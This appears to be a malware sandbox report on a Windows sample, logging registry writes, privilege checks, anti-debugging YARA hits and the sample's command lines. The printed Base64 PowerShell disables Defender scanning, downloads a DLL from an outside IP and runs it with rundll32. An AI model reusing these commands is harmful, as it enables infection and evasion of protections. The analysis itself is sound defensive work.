AbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAdgBvAGkAZABhAGIAbABlAG4AZQBzAHMAVQBuAGYAaQBsAGUALgBkAGwAbAAsAFIAUwAzADIAOwA= filepath: reg	1	1
ShellExecuteExW March 7, 2023, 9:58 a.m.	show_type: 0 filepath_r: reg parameters: add HKCU\SOFTWARE\CondiddlingDeliberatively /v Immeritous /d PiiFCMkkXclVXbmwWThiQHRYByeJiwvqfDzjjRQfrrxMxrhOOpuHOUAKGykrqmXvCtXiEWRIhWxCmopITwlPKxzkfiIJLdxlUOALfUsBGPcDqeIilmRbociRsfJEyW filepath: reg	1	1
ShellExecuteExW March 7, 2023, 9:58 a.m.	show_type: 0 filepath_r: reg parameters: add HKCU\SOFTWARE\CondiddlingDeliberatively /v physiocratistSexological /d jzgTeLWOUcsqGmuEncfqSiyACQZsRAnUmuNJmgCzyxQeiJHHUIiXJGVYZnDvzstXXjAzkztvvATBNfhwfzMMrJbelMHDSDHXQgnDGgZTKzqqOsGPWdzfcccJdBZlQtFxJxHEFmGlVQlkzKXkscYuksoiUOUHVcfOblElwgBJPxODcHgdgWDCulOsfemhRpDZVUzxAkzdpEjTuIpNeoPnJJsvUlOqfWmHQNBidfIGSAEzywxQZjfoQEWDchRsloLDdfUGOnYhEsjguGYwufydFepUQgOgUCaRdsHSsHWOWibzvmhQIlpKwOUPtPfBFCQqOYlrGlcXUuGPwKGkXUWUqPTeCiNonZEWTvDPVmAnTOFatlxsQeFxXXzaUGCUeJPRCRDiBccAGUpjUKAZHFYyqcxrTKNenNYaxzkeAnKSuflwrSPDtEpxOtTxmZtoDQ filepath: reg	1	1
ShellExecuteExW March 7, 2023, 9:58 a.m.	show_type: 0 filepath_r: reg parameters: add HKCU\SOFTWARE\CondiddlingDeliberatively /v epicuticle /d YMuhZoVzcidWxeZuPNTnkynxFHcEegOxrmsBtVSjXxechqdqQLeAiKDMNcFIlSdqZgjWpDTroVjsXSquKpRMTtOIToPucQjhWoIRsHunvHgXbrBWHAWLgBtZPuqYWncoVBczOUNQJrLaRMoewvIjBDgsLGhwYMbtFRmyWWEyGHOjkzUiNaolBvAsUjOhMhiHItrIPpTyMLvTvpPWdPZKawZNzmmMmKqAqKjuxUxxhyGypTkntNSfUmbkhfuDAZVndNxsxDLZevGCWMtdstzjKLRJlugyWGKYcujicpqGVKrBfdkPEcaXCJLHZxZtzIKXlhRwPqxkyLkkYfcHXYTZcbCirjuVpfAREiUxagjLqkOAsIksTIIoCZrRepvOUkILAawfgycNHPVWXEDLbqwrkcAuZWrVsdJUZWuUfrIoVSumAxlrafpMOMqShjofveKLPVcAMfviQzTVv filepath: reg	1	1
ShellExecuteExW March 7, 2023, 9:58 a.m.	show_type: 0 filepath_r: reg parameters: add HKCU\SOFTWARE\CondiddlingDeliberatively /v SexisyllableCommandos /d AlrexpwMNIxFAedbHwwSzzZHUahyniRudIjrUwHoROxwvSIzzxsBWkGSUJMvsxdWyabHWlHXJQSymtyXbIpHbQpO filepath: reg	1	1
ShellExecuteExW March 7, 2023, 9:58 a.m.	show_type: 0 filepath_r: powershell parameters: $CondiddlingDeliberatively = Get-ItemProperty -Path HKCU:\SOFTWARE\CondiddlingDeliberatively \| %{$_.maliceproof}; powershell -windowstyle Minimized -encodedcommand "JABNAGUAYQBnAGU$CondiddlingDeliberatively" filepath: powershell	1	1

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW March 7, 2023, 9:58 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW March 7, 2023, 9:58 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (50 out of 62 events)

description	Escalate priviledges	rule	Escalate_priviledges
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Escalate priviledges	rule	Escalate_priviledges
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Escalate priviledges	rule	Escalate_priviledges
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Escalate priviledges	rule	Escalate_priviledges
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Escalate priviledges	rule	Escalate_priviledges
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context

Uses Windows utilities for basic Windows functionality (12 events)

cmdline	reg add HKCU\SOFTWARE\CondiddlingDeliberatively /v physiocratistSexological /d jzgTeLWOUcsqGmuEncfqSiyACQZsRAnUmuNJmgCzyxQeiJHHUIiXJGVYZnDvzstXXjAzkztvvATBNfhwfzMMrJbelMHDSDHXQgnDGgZTKzqqOsGPWdzfcccJdBZlQtFxJxHEFmGlVQlkzKXkscYuksoiUOUHVcfOblElwgBJPxODcHgdgWDCulOsfemhRpDZVUzxAkzdpEjTuIpNeoPnJJsvUlOqfWmHQNBidfIGSAEzywxQZjfoQEWDchRsloLDdfUGOnYhEsjguGYwufydFepUQgOgUCaRdsHSsHWOWibzvmhQIlpKwOUPtPfBFCQqOYlrGlcXUuGPwKGkXUWUqPTeCiNonZEWTvDPVmAnTOFatlxsQeFxXXzaUGCUeJPRCRDiBccAGUpjUKAZHFYyqcxrTKNenNYaxzkeAnKSuflwrSPDtEpxOtTxmZtoDQ
cmdline	reg add HKCU\SOFTWARE\VicariousPluton /v isatine /d CfCuLyndhuohVhHxOHrXeXrWuuaJOOAcwxwmDjhFeIdivrzKrgukrxouNzGqOujwhqzAoxkutLnKiyVdvADKphHFrTjVxRjpSwIgOUepydHTopBGXHiwNpKGwgxhWLrYEKnppsCAlQsxWIdCapIslWOwbldEMdiPprvvzpWNLqYAxilvFQtyBlfxYrKbHKsOARoIYpjcEkpHRSwFrqHBhiiIKHGPgJANDGJmXETGkrqAubmuTuzZZdYDEwMVZxOjHYImTqWwlSbSgOIksGmrgsWWOtdXjqEMu
cmdline	"C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v physiocratistSexological /d jzgTeLWOUcsqGmuEncfqSiyACQZsRAnUmuNJmgCzyxQeiJHHUIiXJGVYZnDvzstXXjAzkztvvATBNfhwfzMMrJbelMHDSDHXQgnDGgZTKzqqOsGPWdzfcccJdBZlQtFxJxHEFmGlVQlkzKXkscYuksoiUOUHVcfOblElwgBJPxODcHgdgWDCulOsfemhRpDZVUzxAkzdpEjTuIpNeoPnJJsvUlOqfWmHQNBidfIGSAEzywxQZjfoQEWDchRsloLDdfUGOnYhEsjguGYwufydFepUQgOgUCaRdsHSsHWOWibzvmhQIlpKwOUPtPfBFCQqOYlrGlcXUuGPwKGkXUWUqPTeCiNonZEWTvDPVmAnTOFatlxsQeFxXXzaUGCUeJPRCRDiBccAGUpjUKAZHFYyqcxrTKNenNYaxzkeAnKSuflwrSPDtEpxOtTxmZtoDQ
cmdline	"C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\VicariousPluton /v isatine /d CfCuLyndhuohVhHxOHrXeXrWuuaJOOAcwxwmDjhFeIdivrzKrgukrxouNzGqOujwhqzAoxkutLnKiyVdvADKphHFrTjVxRjpSwIgOUepydHTopBGXHiwNpKGwgxhWLrYEKnppsCAlQsxWIdCapIslWOwbldEMdiPprvvzpWNLqYAxilvFQtyBlfxYrKbHKsOARoIYpjcEkpHRSwFrqHBhiiIKHGPgJANDGJmXETGkrqAubmuTuzZZdYDEwMVZxOjHYImTqWwlSbSgOIksGmrgsWWOtdXjqEMu
cmdline	reg add HKCU\SOFTWARE\CondiddlingDeliberatively /v SexisyllableCommandos /d AlrexpwMNIxFAedbHwwSzzZHUahyniRudIjrUwHoROxwvSIzzxsBWkGSUJMvsxdWyabHWlHXJQSymtyXbIpHbQpO
cmdline	"C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v Immeritous /d PiiFCMkkXclVXbmwWThiQHRYByeJiwvqfDzjjRQfrrxMxrhOOpuHOUAKGykrqmXvCtXiEWRIhWxCmopITwlPKxzkfiIJLdxlUOALfUsBGPcDqeIilmRbociRsfJEyW
cmdline	reg add HKCU\SOFTWARE\CondiddlingDeliberatively /v maliceproof /d AcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAFYAaQBjAGEAcgBpAG8AdQBzAFAAbAB1AHQAbwBuACAAfAAgACUAewAkAF8ALgBtAGEAbABpAGMAZQBwAHIAbwBvAGYAfQA7ACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIAAiAEkAcwBsAGEAbgBkAGUAcgBzACIAIAArACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgA7ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAZgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATQBlAGEAZwBlAHIARABpAHMAcwBlAHIAdABhAHQAaQBvAG4AKQApADsAIABbAGMAbABhAHMAcwBpAGMAeQBjADEAXQA6ADoARQB4AGUAYwB1AHQAZQAoACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AcABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAiACIAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlACAAPQAgAGAAKABnAGUAdAAtAGwAbwBjAGEAdABpAG8AbgBgACkALgBEAHIAaQB2AGUALgBOAGEAbQBlACAAKwAgACcAOgBcACcAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABgACQAYwB1AHIAcgBlAG4AdABEAHIAaQB2AGUAOwByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAvAHYAIABVAHMAZQByAGkAbgBpAHQAIAAvAGYAOwAgAHIAZQBnACAAZABlAGwAZQB0AGUAIABIAEsARQBZAF8AQwBVAFIAUgBFAE4AVABfAFUAUwBFAFIAXABTAE8ARgBUAFcAQQBSAEUAXABWAGkAYwBhAHIAaQBvAHUAcwBQAGwAdQB0AG8AbgAgAC8AdgAgAG0AYQBsAGkAYwBlAHAAcgBvAG8AZgAgAC8AZgAiACIAIgApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADQAMgAuADkAMwAuADIANQAwAC4AMQA1ADIALwB1AG0AVQBBADYAUwBoAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXAB2AG8AaQBkAGEAYgBsAGUAbgBlAHMAcwBVAG4AZgBpAGwAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAdgBvAGkAZABhAGIAbABlAG4AZQBzAHMAVQBuAGYAaQBsAGUALgBkAGwAbAAsAFIAUwAzADIAOwA=
cmdline	reg add HKCU\SOFTWARE\CondiddlingDeliberatively /v epicuticle /d YMuhZoVzcidWxeZuPNTnkynxFHcEegOxrmsBtVSjXxechqdqQLeAiKDMNcFIlSdqZgjWpDTroVjsXSquKpRMTtOIToPucQjhWoIRsHunvHgXbrBWHAWLgBtZPuqYWncoVBczOUNQJrLaRMoewvIjBDgsLGhwYMbtFRmyWWEyGHOjkzUiNaolBvAsUjOhMhiHItrIPpTyMLvTvpPWdPZKawZNzmmMmKqAqKjuxUxxhyGypTkntNSfUmbkhfuDAZVndNxsxDLZevGCWMtdstzjKLRJlugyWGKYcujicpqGVKrBfdkPEcaXCJLHZxZtzIKXlhRwPqxkyLkkYfcHXYTZcbCirjuVpfAREiUxagjLqkOAsIksTIIoCZrRepvOUkILAawfgycNHPVWXEDLbqwrkcAuZWrVsdJUZWuUfrIoVSumAxlrafpMOMqShjofveKLPVcAMfviQzTVv
cmdline	"C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v epicuticle /d YMuhZoVzcidWxeZuPNTnkynxFHcEegOxrmsBtVSjXxechqdqQLeAiKDMNcFIlSdqZgjWpDTroVjsXSquKpRMTtOIToPucQjhWoIRsHunvHgXbrBWHAWLgBtZPuqYWncoVBczOUNQJrLaRMoewvIjBDgsLGhwYMbtFRmyWWEyGHOjkzUiNaolBvAsUjOhMhiHItrIPpTyMLvTvpPWdPZKawZNzmmMmKqAqKjuxUxxhyGypTkntNSfUmbkhfuDAZVndNxsxDLZevGCWMtdstzjKLRJlugyWGKYcujicpqGVKrBfdkPEcaXCJLHZxZtzIKXlhRwPqxkyLkkYfcHXYTZcbCirjuVpfAREiUxagjLqkOAsIksTIIoCZrRepvOUkILAawfgycNHPVWXEDLbqwrkcAuZWrVsdJUZWuUfrIoVSumAxlrafpMOMqShjofveKLPVcAMfviQzTVv
cmdline	"C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v SexisyllableCommandos /d AlrexpwMNIxFAedbHwwSzzZHUahyniRudIjrUwHoROxwvSIzzxsBWkGSUJMvsxdWyabHWlHXJQSymtyXbIpHbQpO
cmdline	"C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v maliceproof /d AcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAFYAaQBjAGEAcgBpAG8AdQBzAFAAbAB1AHQAbwBuACAAfAAgACUAewAkAF8ALgBtAGEAbABpAGMAZQBwAHIAbwBvAGYAfQA7ACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIAAiAEkAcwBsAGEAbgBkAGUAcgBzACIAIAArACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgA7ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAZgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATQBlAGEAZwBlAHIARABpAHMAcwBlAHIAdABhAHQAaQBvAG4AKQApADsAIABbAGMAbABhAHMAcwBpAGMAeQBjADEAXQA6ADoARQB4AGUAYwB1AHQAZQAoACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AcABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAiACIAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlACAAPQAgAGAAKABnAGUAdAAtAGwAbwBjAGEAdABpAG8AbgBgACkALgBEAHIAaQB2AGUALgBOAGEAbQBlACAAKwAgACcAOgBcACcAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABgACQAYwB1AHIAcgBlAG4AdABEAHIAaQB2AGUAOwByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAvAHYAIABVAHMAZQByAGkAbgBpAHQAIAAvAGYAOwAgAHIAZQBnACAAZABlAGwAZQB0AGUAIABIAEsARQBZAF8AQwBVAFIAUgBFAE4AVABfAFUAUwBFAFIAXABTAE8ARgBUAFcAQQBSAEUAXABWAGkAYwBhAHIAaQBvAHUAcwBQAGwAdQB0AG8AbgAgAC8AdgAgAG0AYQBsAGkAYwBlAHAAcgBvAG8AZgAgAC8AZgAiACIAIgApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADQAMgAuADkAMwAuADIANQAwAC4AMQA1ADIALwB1AG0AVQBBADYAUwBoAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXAB2AG8AaQBkAGEAYgBsAGUAbgBlAHMAcwBVAG4AZgBpAGwAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAdgBvAGkAZABhAGIAbABlAG4AZQBzAHMAVQBuAGYAaQBsAGUALgBkAGwAbAAsAFIAUwAzADIAOwA=
cmdline	reg add HKCU\SOFTWARE\CondiddlingDeliberatively /v Immeritous /d PiiFCMkkXclVXbmwWThiQHRYByeJiwvqfDzjjRQfrrxMxrhOOpuHOUAKGykrqmXvCtXiEWRIhWxCmopITwlPKxzkfiIJLdxlUOALfUsBGPcDqeIilmRbociRsfJEyW

Powershell script adds registry entries (1 event)

cmd

"c:\windows\system32\rundll32.exe" c:\users\test22\appdata\local\temp\\voidablenessunfile.dll rs32reg add hkcu\software\condiddlingdeliberatively /v physiocratistsexological /d jzgtelwoucsqgmuencfqsiyacqzsranumunjmgczyxqeijhhuiixjgvyzndvzstxxjazkztvvatbnfhwfzmmrjbelmhdsdhxqgndggztkzqqosgpwdzfcccjdbzlqtfxjxhefmglvqlkzkxkscyuksoiuouhvcfoblelwgbjpxodchgdgwdculosfemhrpdzvuzxakzdpejtuipneopnjjsvuloqfwmhqnbidfigsaezywxqzjfoqewdchrslolddfugonyhesjgugywufydfepuqgogucardshsshwowibzvmhqilpkwouptpfbfcqqoylrglcxuugpwkgkxuwuqptecinonzewtvdpvmantofatlxsqefxxxzaugcuejprcrdibccagupjukazhfyyqcxrtknennyaxzkeanksuflwrspdtepxottxmztodqreg add hkcu\software\vicariouspluton /v isatine /d cfculyndhuohvhhxohrxexrwuuajooacwxwmdjhfeidivrzkrgukrxounzgqoujwhqzaoxkutlnkiyvdvadkphhfrtjvxrjpswigouepydhtopbgxhiwnpkgwgxhwlryeknppscalqsxwidcapislwowbldemdipprvvzpwnlqyaxilvfqtyblfxyrkbhksoaroiypjcekphrswfrqhbhiiikhgpgjandgjmxetgkrqaubmutuzzzdydewmvzxojhyimtqwwlsbsgoiksgmrgswwotdxjqemu"c:\windows\system32\reg.exe" add hkcu\software\condiddlingdeliberatively /v physiocratistsexological /d jzgtelwoucsqgmuencfqsiyacqzsranumunjmgczyxqeijhhuiixjgvyzndvzstxxjazkztvvatbnfhwfzmmrjbelmhdsdhxqgndggztkzqqosgpwdzfcccjdbzlqtfxjxhefmglvqlkzkxkscyuksoiuouhvcfoblelwgbjpxodchgdgwdculosfemhrpdzvuzxakzdpejtuipneopnjjsvuloqfwmhqnbidfigsaezywxqzjfoqewdchrslolddfugonyhesjgugywufydfepuqgogucardshsshwowibzvmhqilpkwouptpfbfcqqoylrglcxuugpwkgkxuwuqptecinonzewtvdpvmantofatlxsqefxxxzaugcuejprcrdibccagupjukazhfyyqcxrtknennyaxzkeanksuflwrspdtepxottxmztodqpowershell $condiddlingdeliberatively = get-itemproperty -path hkcu:\software\condiddlingdeliberatively | %{$_.maliceproof}; powershell -windowstyle minimized -encodedcommand "jabnaguayqbnagu$condiddlingdeliberatively""c:\windows\system32\reg.exe" add hkcu\software\vicariouspluton /v isatine /d cfculyndhuohvhhxohrxexrwuuajooacwxwmdjhfeidivrzkrgukrxounzgqoujwhqzaoxkutlnkiyvdvadkphhfrtjvxrjpswigouepydhtopbgxhiwnpkgwgxhwlryeknppscalqsxwidcapislwowbldemdipprvvzpwnlqyaxilvfqtyblfxyrkbhksoaroiypjcekphrswfrqhbhiiikhgpgjandgjmxetgkrqaubmutuzzzdydewmvzxojhyimtqwwlsbsgoiksgmrgswwotdxjqemureg add hkcu\software\condiddlingdeliberatively /v sexisyllablecommandos /d alrexpwmnixfaedbhwwszzzhuahynirudijruwhoroxwvsizzxsbwkgsujmvsxdwyabhwlhxjqsymtyxbiphbqpo"c:\windows\system32\reg.exe" add hkcu\software\condiddlingdeliberatively /v immeritous /d piifcmkkxclvxbmwwthiqhrybyejiwvqfdzjjrqfrrxmxrhoopuhouakgykrqmxvctxiewrihwxcmopitwlpkxzkfiijldxluoalfusbgpcdqeiilmrbocirsfjeywreg add hkcu\software\condiddlingdeliberatively /v maliceproof /d acgbeagkacwbzaguacgb0ageadabpag8abgagad0aiabhaguadaataekadablag0auabyag8acablahiadab5acaalqbqageadaboacaasablaemavqa6afwaxabtae8argbuafcaqqbsaeuaxabcafyaaqbjageacgbpag8adqbzafaabab1ahqabwbuacaafaagacuaewakaf8algbtageababpagmazqbwahiabwbvagyafqa7acaajabnaguayqbnaguacgbeagkacwbzaguacgb0ageadabpag8abgagad0aiaaiaekacwbsageabgbkaguacgbzaciaiaaracaajabnaguayqbnaguacgbeagkacwbzaguacgb0ageadabpag8abga7acaawwbsaguazgbsaguaywb0agkabwbuac4aqqbzahmazqbtagiabab5af0aoga6aewabwbhagqakabbaemabwbuahyazqbyahqaxqa6adoazgbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqatqblageazwblahiarabpahmacwblahiadabhahqaaqbvag4akqapadsaiabbagmababhahmacwbpagmaeqbjadeaxqa6adoarqb4aguaywb1ahqazqaoaciacabvahcazqbyahmaaablagwabaagac0azqb4aguaywb1ahqaaqbvag4acabvagwaaqbjahkaiabiahkacabhahmacwagac0adwbpag4azabvahcacwb0ahkabablacaaaabpagqazablag4aiaaiaciayaakagmadqbyahiazqbuahqarabyagkadgblacaapqagagaakabnaguadaatagwabwbjageadabpag8abgbgackalgbeahiaaqb2agualgboageabqblacaakwagaccaogbcaccaowagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabgacqaywb1ahiacgblag4adabeahiaaqb2aguaowbyaguazwagagqazqbsaguadablacaasablaeuawqbfaemavqbsafiarqboafqaxwbvafmarqbsafwauwbpaeyavabxaeeaugbfafwatqbpagmacgbvahmabwbmahqaxabxagkabgbkag8adwbzafwaqwb1ahiacgblag4adabwaguacgbzagkabwbuafwaugb1ag4aiaavahyaiabvahmazqbyagkabgbpahqaiaavagyaowagahiazqbnacaazablagwazqb0aguaiabiaesarqbzaf8aqwbvafiaugbfae4avabfafuauwbfafiaxabtae8argbuafcaqqbsaeuaxabwagkaywbhahiaaqbvahuacwbqagwadqb0ag8abgagac8adgagag0ayqbsagkaywblahaacgbvag8azgagac8azgaiaciaigapadsasqbuahyabwbragualqbxaguaygbsaguacqb1aguacwb0acaaaab0ahqacaa6ac8alwaxadqamgauadkamwauadianqawac4amqa1adialwb1ag0avqbbadyauwboac8amaazacaalqbpacaajablag4adga6afqarqbnafaaxab2ag8aaqbkageaygbsaguabgblahmacwbvag4azgbpagwazqauagqababsadsaiabyahuabgbkagwabaazadiaiaakaguabgb2adoavabfae0auabcafwadgbvagkazabhagiabablag4azqbzahmavqbuagyaaqbsagualgbkagwabaasafiauwazadiaowa="c:\windows\system32\windowspowershell\v1.0\powershell.exe" $condiddlingdeliberatively = get-itemproperty -path hkcu:\software\condiddlingdeliberatively | %{$_.maliceproof}; powershell -windowstyle minimized -encodedcommand "jabnaguayqbnagu$condiddlingdeliberatively"reg add hkcu\software\condiddlingdeliberatively /v epicuticle /d ymuhzovzcidwxezupntnkynxfhceegoxrmsbtvsjxxechqdqqleaikdmncfilsdqzgjwpdtrovjsxsqukprmttoitopucqjhwoirshunvhgxbrbwhawlgbtzpuqywncovbczounqjrlarmoewvijbdgslghwymbtfrmywweyghojkzuinaolbvasujohmhihitripptymlvtvppwdpzkawznzmmmmkqaqkjuxuxxhygyptkntnsfumbkhfudazvndnxsxdlzevgcwmtdstzjklrjlugywgkycujicpqgvkrbfdkpecaxcjlhzxztzikxlhrwpqxkylkkyfchxytzcbcirjuvpfareiuxagjlqkoasikstiioczrrepvoukilaawfgycnhpvwxedlbqwrkcauzwrvsdjuzwuufriovsumaxlrafpmomqshjofveklpvcamfviqztvv"c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle minimized -encodedcommand jabnaguayqbnaguacgbeagkacwbzaguacgb0ageadabpag8abgagad0aiabhaguadaataekadablag0auabyag8acablahiadab5acaalqbqageadaboacaasablaemavqa6afwaxabtae8argbuafcaqqbsaeuaxabcafyaaqbjageacgbpag8adqbzafaabab1ahqabwbuacaafaagacuaewakaf8algbtageababpagmazqbwahiabwbvagyafqa7acaajabnaguayqbnaguacgbeagkacwbzaguacgb0ageadabpag8abgagad0aiaaiaekacwbsageabgbkaguacgbzaciaiaaracaajabnaguayqbnaguacgbeagkacwbzaguacgb0ageadabpag8abga7acaawwbsaguazgbsaguaywb0agkabwbuac4aqqbzahmazqbtagiabab5af0aoga6aewabwbhagqakabbaemabwbuahyazqbyahqaxqa6adoazgbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqatqblageazwblahiarabpahmacwblahiadabhahqaaqbvag4akqapadsaiabbagmababhahmacwbpagmaeqbjadeaxqa6adoarqb4aguaywb1ahqazqaoaciacabvahcazqbyahmaaablagwabaagac0azqb4aguaywb1ahqaaqbvag4acabvagwaaqbjahkaiabiahkacabhahmacwagac0adwbpag4azabvahcacwb0ahkabablacaaaabpagqazablag4aiaaiaciayaakagmadqbyahiazqbuahqarabyagkadgblacaapqagagaakabnaguadaatagwabwbjageadabpag8abgbgackalgbeahiaaqb2agualgboageabqblacaakwagaccaogbcaccaowagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabgacqaywb1ahiacgblag4adabeahiaaqb2aguaowbyaguazwagagqazqbsaguadablacaasablaeuawqbfaemavqbsafiarqboafqaxwbvafmarqbsafwauwbpaeyavabxaeeaugbfafwatqbpagmacgbvahmabwbmahqaxabxagkabgbkag8adwbzafwaqwb1ahiacgblag4adabwaguacgbzagkabwbuafwaugb1ag4aiaavahyaiabvahmazqbyagkabgbpahqaiaavagyaowagahiazqbnacaazablagwazqb0aguaiabiaesarqbzaf8aqwbvafiaugbfae4avabfafuauwbfafiaxabtae8argbuafcaqqbsaeuaxabwagkaywbhahiaaqbvahuacwbqagwadqb0ag8abgagac8adgagag0ayqbsagkaywblahaacgbvag8azgagac8azgaiaciaigapadsasqbuahyabwbragualqbxaguaygbsaguacqb1aguacwb0acaaaab0ahqacaa6ac8alwaxadqamgauadkamwauadianqawac4amqa1adialwb1ag0avqbbadyauwboac8amaazacaalqbpacaajablag4adga6afqarqbnafaaxab2ag8aaqbkageaygbsaguabgblahmacwbvag4azgbpagwazqauagqababsadsaiabyahuabgbkagwabaazadiaiaakaguabgb2adoavabfae0auabcafwadgbvagkazabhagiabablag4azqbzahmavqbuagyaaqbsagualgbkagwabaasafiauwazadiaowa="c:\windows\system32\reg.exe" add hkcu\software\condiddlingdeliberatively /v epicuticle /d 